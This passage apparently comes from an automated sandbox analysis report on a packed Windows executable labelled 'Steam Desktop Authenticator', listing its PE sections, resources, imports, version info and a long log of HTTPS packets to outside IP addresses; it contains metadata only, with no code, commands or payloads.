IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x13ce50	0x28	.MPRESS2
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13c118	0xd0	.MPRESS2
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.MPRESS1	0x1000	0x13b000	0x63400	False	1.00031240161	data	7.99951858505	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.MPRESS2	0x13c000	0xe80	0x1000	False	0.50732421875	data	5.63658087631	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x13d000	0x2b508	0x2b600	False	0.124651026657	data	3.38878491057	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x13d0f0	0x1ffb	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x13f114	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x14f964	0x94a8	data	English	United States
RT_ICON	0x158e34	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x1592c4	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x159754	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x159be4	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x159d34	0x5488	data	English	United States
RT_ICON	0x15f1e4	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 252, next used block 1056964608	English	United States
RT_ICON	0x163434	0x25a8	data	English	United States
RT_ICON	0x165a04	0x10a8	data	English	United States
RT_ICON	0x166ad4	0x988	data	English	United States
RT_ICON	0x167484	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_MENU	0x13ab8c	0x2c8	empty	English	United States
RT_DIALOG	0x13ae54	0xe8	empty	English	United States
RT_ACCELERATOR	0x13af3c	0x48	empty	English	United States
RT_RCDATA	0x13af84	0x103	empty	English	United States
RT_GROUP_ICON	0x167a6c	0x84	data	English	United States
RT_GROUP_ICON	0x167b18	0x14	data	English	United States
RT_GROUP_ICON	0x167b54	0x14	data	English	United States
RT_GROUP_ICON	0x167b90	0x14	data	English	United States
RT_GROUP_ICON	0x167bcc	0x14	data	English	United States
RT_VERSION	0x167c20	0x41e	data
RT_MANIFEST	0x168080	0x487	ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32	GetModuleHandleA, GetProcAddress
WSOCK32.dll	WSACleanup
WINMM.dll	mixerOpen
VERSION.dll	VerQueryValueW
COMCTL32.dll	ImageList_Create
PSAPI.DLL	GetModuleBaseNameW
USER32.dll	GetDC
GDI32.dll	BitBlt
COMDLG32.dll	GetOpenFileNameW
ADVAPI32.dll	RegCloseKey
SHELL32.dll	DragFinish
ole32.dll	CoGetObject
OLEAUT32.dll	SafeArrayGetLBound

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2017
Assembly Version	1.0.10.0
InternalName	Steam Desktop Authenticator.exe
FileVersion	1.0.10
CompanyName
LegalTrademarks
Comments	Desktop implementation of Steam's mobile authenticator app
ProductName	Steam Desktop Authenticator
ProductVersion	1.0.10
FileDescription	Steam Desktop Authenticator
OriginalFilename	Steam Desktop Authenticator.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 11:42:58.756686926 CEST	49711	443	192.168.2.3	88.99.66.31
Jul 22, 2021 11:42:58.825814962 CEST	443	49711	88.99.66.31	192.168.2.3
Jul 22, 2021 11:42:58.825999975 CEST	49711	443	192.168.2.3	88.99.66.31
Jul 22, 2021 11:42:58.842880011 CEST	49711	443	192.168.2.3	88.99.66.31
Jul 22, 2021 11:42:58.912139893 CEST	443	49711	88.99.66.31	192.168.2.3
Jul 22, 2021 11:42:58.914864063 CEST	443	49711	88.99.66.31	192.168.2.3
Jul 22, 2021 11:42:58.914935112 CEST	443	49711	88.99.66.31	192.168.2.3
Jul 22, 2021 11:42:58.914988041 CEST	443	49711	88.99.66.31	192.168.2.3
Jul 22, 2021 11:42:58.915002108 CEST	49711	443	192.168.2.3	88.99.66.31
Jul 22, 2021 11:42:58.915035963 CEST	49711	443	192.168.2.3	88.99.66.31
Jul 22, 2021 11:42:58.915039062 CEST	443	49711	88.99.66.31	192.168.2.3
Jul 22, 2021 11:42:58.915071011 CEST	49711	443	192.168.2.3	88.99.66.31
Jul 22, 2021 11:42:58.915173054 CEST	49711	443	192.168.2.3	88.99.66.31
Jul 22, 2021 11:42:59.055423975 CEST	49711	443	192.168.2.3	88.99.66.31
Jul 22, 2021 11:42:59.125174999 CEST	443	49711	88.99.66.31	192.168.2.3
Jul 22, 2021 11:42:59.125299931 CEST	49711	443	192.168.2.3	88.99.66.31
Jul 22, 2021 11:42:59.166641951 CEST	49711	443	192.168.2.3	88.99.66.31
Jul 22, 2021 11:42:59.241749048 CEST	443	49711	88.99.66.31	192.168.2.3
Jul 22, 2021 11:42:59.241862059 CEST	49711	443	192.168.2.3	88.99.66.31
Jul 22, 2021 11:42:59.394864082 CEST	49712	443	192.168.2.3	104.25.234.53
Jul 22, 2021 11:42:59.436276913 CEST	443	49712	104.25.234.53	192.168.2.3
Jul 22, 2021 11:42:59.436394930 CEST	49712	443	192.168.2.3	104.25.234.53
Jul 22, 2021 11:42:59.436954975 CEST	49712	443	192.168.2.3	104.25.234.53
Jul 22, 2021 11:42:59.479173899 CEST	443	49712	104.25.234.53	192.168.2.3
Jul 22, 2021 11:42:59.480345964 CEST	443	49712	104.25.234.53	192.168.2.3
Jul 22, 2021 11:42:59.480372906 CEST	443	49712	104.25.234.53	192.168.2.3
Jul 22, 2021 11:42:59.480423927 CEST	49712	443	192.168.2.3	104.25.234.53
Jul 22, 2021 11:42:59.480467081 CEST	49712	443	192.168.2.3	104.25.234.53
Jul 22, 2021 11:42:59.498867035 CEST	49712	443	192.168.2.3	104.25.234.53
Jul 22, 2021 11:42:59.540132999 CEST	443	49712	104.25.234.53	192.168.2.3
Jul 22, 2021 11:42:59.540498972 CEST	443	49712	104.25.234.53	192.168.2.3
Jul 22, 2021 11:42:59.540566921 CEST	49712	443	192.168.2.3	104.25.234.53
Jul 22, 2021 11:42:59.541446924 CEST	49712	443	192.168.2.3	104.25.234.53
Jul 22, 2021 11:42:59.585441113 CEST	443	49712	104.25.234.53	192.168.2.3
Jul 22, 2021 11:42:59.683588028 CEST	443	49712	104.25.234.53	192.168.2.3
Jul 22, 2021 11:42:59.683687925 CEST	49712	443	192.168.2.3	104.25.234.53
Jul 22, 2021 11:42:59.757873058 CEST	49713	443	192.168.2.3	104.192.141.1
Jul 22, 2021 11:42:59.801004887 CEST	443	49713	104.192.141.1	192.168.2.3
Jul 22, 2021 11:42:59.801134109 CEST	49713	443	192.168.2.3	104.192.141.1
Jul 22, 2021 11:42:59.801935911 CEST	49713	443	192.168.2.3	104.192.141.1
Jul 22, 2021 11:42:59.845109940 CEST	443	49713	104.192.141.1	192.168.2.3
Jul 22, 2021 11:43:00.023966074 CEST	443	49713	104.192.141.1	192.168.2.3
Jul 22, 2021 11:43:00.023997068 CEST	443	49713	104.192.141.1	192.168.2.3
Jul 22, 2021 11:43:00.024015903 CEST	443	49713	104.192.141.1	192.168.2.3
Jul 22, 2021 11:43:00.024127007 CEST	49713	443	192.168.2.3	104.192.141.1
Jul 22, 2021 11:43:00.054200888 CEST	49713	443	192.168.2.3	104.192.141.1
Jul 22, 2021 11:43:00.054538965 CEST	443	49713	104.192.141.1	192.168.2.3
Jul 22, 2021 11:43:00.054663897 CEST	49713	443	192.168.2.3	104.192.141.1
Jul 22, 2021 11:43:00.097695112 CEST	443	49713	104.192.141.1	192.168.2.3
Jul 22, 2021 11:43:00.187654018 CEST	443	49713	104.192.141.1	192.168.2.3
Jul 22, 2021 11:43:00.187798977 CEST	49713	443	192.168.2.3	104.192.141.1
Jul 22, 2021 11:43:00.189469099 CEST	49713	443	192.168.2.3	104.192.141.1
Jul 22, 2021 11:43:00.233757019 CEST	443	49713	104.192.141.1	192.168.2.3
Jul 22, 2021 11:43:00.389164925 CEST	443	49713	104.192.141.1	192.168.2.3
Jul 22, 2021 11:43:00.389215946 CEST	443	49713	104.192.141.1	192.168.2.3
Jul 22, 2021 11:43:00.389240026 CEST	49713	443	192.168.2.3	104.192.141.1
Jul 22, 2021 11:43:00.389286995 CEST	49713	443	192.168.2.3	104.192.141.1
Jul 22, 2021 11:43:00.416637897 CEST	443	49713	104.192.141.1	192.168.2.3
Jul 22, 2021 11:43:00.416724920 CEST	49713	443	192.168.2.3	104.192.141.1
Jul 22, 2021 11:43:00.483721018 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:00.651829958 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:00.652004004 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:00.653352022 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:00.820758104 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:00.820804119 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:00.820842028 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:00.820880890 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:00.820909977 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:00.820987940 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:00.821106911 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:00.821405888 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:00.821446896 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:00.821504116 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:00.821556091 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:00.845171928 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:00.857933044 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:00.858073950 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.012918949 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.012980938 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.013000965 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.013252020 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.014991999 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.148030996 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.148221970 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.210562944 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.210608959 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.210647106 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.210685015 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.210731983 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.210752964 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.210774899 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.210813999 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.210813999 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.210853100 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.210891008 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.210918903 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.210927010 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.210966110 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.210988998 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.211005926 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.211054087 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.211143017 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.378385067 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378424883 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378443956 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378465891 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378496885 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378515005 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378531933 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378549099 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378556967 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.378570080 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378599882 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378606081 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.378619909 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378637075 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.378642082 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378662109 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.378664017 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378684998 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.378684998 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378704071 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.378705978 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378726959 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.378729105 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378747940 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.378748894 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378767967 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.378772974 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378791094 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.378796101 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378813982 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.378819942 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378829956 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.378842115 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378861904 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378881931 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378902912 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.378921032 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.378947973 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.547107935 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547158003 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547178030 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547198057 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547219038 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547266006 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547290087 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547313929 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547336102 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547357082 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547379971 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547405958 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547409058 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.547430038 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547451973 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547473907 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547496080 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547518015 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547540903 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547555923 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.547564030 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547589064 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547614098 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547633886 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.547636986 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547658920 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547682047 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547704935 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547722101 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.547728062 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547749996 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547777891 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547802925 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547808886 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.547825098 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547847033 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547868967 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547879934 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.547892094 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547916889 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547939062 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547946930 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.547965050 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.547987938 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.548010111 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.548011065 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.548032999 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.548054934 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.548074961 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.548077106 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.548099995 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.548121929 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.548149109 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.548171997 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.548181057 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.548194885 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.548217058 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.548238993 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.548276901 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.548337936 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.715574980 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715609074 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715627909 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715646029 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715666056 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715684891 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715704918 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715724945 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715749025 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715770006 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715790987 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715811014 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715832949 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715852022 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715872049 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715874910 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.715894938 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715919971 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715943098 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715964079 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.715985060 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716001987 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716025114 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716047049 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716062069 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.716068029 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716101885 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716123104 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716144085 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716162920 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716181993 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716202021 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716224909 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716242075 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716257095 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716278076 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716295004 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716305017 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.716316938 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716331959 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.716332912 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716341019 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.716348886 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716375113 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716398001 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716419935 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716430902 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.716439962 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716460943 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716480970 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716500998 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716507912 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.716521978 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716542959 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716558933 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716579914 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716590881 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.716599941 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716622114 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716644049 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716666937 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716675043 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.716690063 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716711044 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716732025 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716751099 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716769934 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716774940 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.716790915 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716810942 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716833115 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716854095 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716872931 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716892004 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716911077 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716928959 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716948032 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716969013 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.716969967 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.716984034 CEST	49715	443	192.168.2.3	52.217.201.169
Jul 22, 2021 11:43:01.716993093 CEST	443	49715	52.217.201.169	192.168.2.3
Jul 22, 2021 11:43:01.717015028 CEST	443	49715	52.217.201.169	192.168.2.3
